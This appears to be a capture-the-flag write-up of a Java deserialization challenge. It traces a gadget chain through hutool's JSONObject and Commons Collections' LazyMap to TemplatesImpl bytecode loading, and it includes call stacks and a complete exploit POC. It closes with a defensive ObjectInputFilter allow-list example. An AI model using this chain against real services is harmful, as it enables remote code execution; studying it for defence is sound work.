Challenge description:
Attachment
The challenge contains two classes: Testapp and Myexpect.
Testapp
It starts a service on local port 8888, reads the bugstr parameter and deserializes its content.
The dependencies suggest Commons Collections (CC) deserialization, but the challenge ships CC 3.2.2. Since 3.2.1, CC has a checkUnsafeSerialization feature that inspects deserialized content, and InvokerTransformer, which the usual CC chains rely on, is on its blacklist. The challenge does, however, provide another class: Myexpect.
Myexpect
Its getAnyexcept method calls newInstance(), which can instantiate a class through a single-argument constructor.
newInstance brings TrAXFilter to mind: its constructor accepts a Templates object, which lets TemplatesImpl load the malicious bytecode dynamically.
Next we need to find where getAnyexcept is called. Following the hint, search from cn.hutool.json.JSONObject.put:
cn.hutool.json.JSONObject.put -> com.app.Myexpect#getAnyexcept
Tracing call by call, we find that PropDesc#getValue() invokes the bean's getter methods via reflection.
Call stack
getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)
Next we need to see where put is called; here the first half of the CC6 chain can be reused directly:
put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)
POC
import cn.hutool.json.JSONObject;
import com.app.Myexpect;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import static com.app.Tools.*;   // getBytes, setFieldValue, serialize, unserialize

public class POC {
    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the Evil class bytes; TrAXFilter's constructor calls newTransformer() on it
        byte[] bytes = getBytes("Evil");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "Sentiment");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        // Myexpect.getAnyexcept() reflectively does new TrAXFilter(templates)
        Myexpect myexpect = new Myexpect();
        myexpect.setTargetclass(TrAXFilter.class);
        myexpect.setTypeparam(new Class[]{Templates.class});
        myexpect.setTypearg(new Object[]{templates});

        // LazyMap over a hutool JSONObject: LazyMap.get -> JSONObject.put -> beanToMap -> getter
        JSONObject jsonObject = new JSONObject();
        ConstantTransformer transformer = new ConstantTransformer(1); // harmless placeholder while building
        Map outerMap = LazyMap.decorate(jsonObject, transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "Sentiment");
        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "1");    // hashCode() runs once here, with the placeholder constant
        jsonObject.remove("Sentiment");   // clear the key so LazyMap.get() recomputes during readObject
        setFieldValue(transformer, "iConstant", myexpect); // swap in the real payload after construction

        byte[] serialize = serialize(hashMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
        //unserialize(serialize);
    }
}
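The two points above that matter to a defender are that a library-side blacklist such as CC 3.2.1+'s checkUnsafeSerialization only covers the classes its authors thought of (Myexpect and hutool's JSONObject are not on it), and that the chain is entered through HashMap.readObject calling hashCode on a key. The following is an added example, not code from the writeup or from the challenge, showing the JDK-level control that cuts both off: a JEP 290 ObjectInputFilter with an allow-list. The class names on the allow-list, the resource limits and the NotOnAllowList stand-in class are assumptions made for the demonstration, standing in for whatever the real service expects to receive.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Map;

public class FilteredDeserialize {

    // Allow-list filter (assumed policy: the endpoint only ever expects a HashMap of
    // String to Integer). Every other class is rejected by the trailing "!*", and the
    // limits bound the graph so deeply nested or oversized payloads fail early too.
    // java.lang.Number is listed because Integer's serializable superclass is checked as well.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxrefs=512;maxbytes=65536;"
          + "java.util.HashMap;java.lang.String;java.lang.Integer;java.lang.Number;"
          + "!*");

    /** Deserialize with the filter installed; rejection surfaces as InvalidClassException. */
    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            // The filter is consulted when each class descriptor is resolved, i.e. before the
            // object is instantiated, so HashMap.readObject never reaches a rejected key's hashCode().
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Constructed stand-in for any class that is not on the allow-list (not a gadget):
    // it is rejected by name, so its hashCode() is never invoked during deserialization.
    static final class NotOnAllowList implements Serializable {
        private static final long serialVersionUID = 1L;
        @Override public int hashCode() { return 42; }
    }

    public static void main(String[] args) throws Exception {
        Map<String, Integer> benign = new HashMap<>();
        benign.put("Sentiment", 1);
        Object ok = deserialize(serialize(benign));
        System.out.println("benign map accepted: " + ok);

        Map<Object, String> suspect = new HashMap<>();
        suspect.put(new NotOnAllowList(), "1");   // key class is not on the allow-list
        try {
            deserialize(serialize(suspect));
            System.out.println("unexpected: suspect map accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected by filter: " + e.getMessage());
        }
    }
}
```

Compile and run with any JDK 9 or later (the same API is backported to 8u121+ as sun.misc.ObjectInputFilter). The design choice is allow-list over deny-list: a pattern like "!org.apache.commons.collections.**;!com.sun.org.apache.xalan.**" would have stopped this particular chain, but it would miss the next gadget just as CC's own blacklist missed Myexpect and hutool here. When the service cannot be switched away from Java serialization, the filter can also be set process-wide with -Djdk.serialFilter=... so that every ObjectInputStream in the JVM is covered.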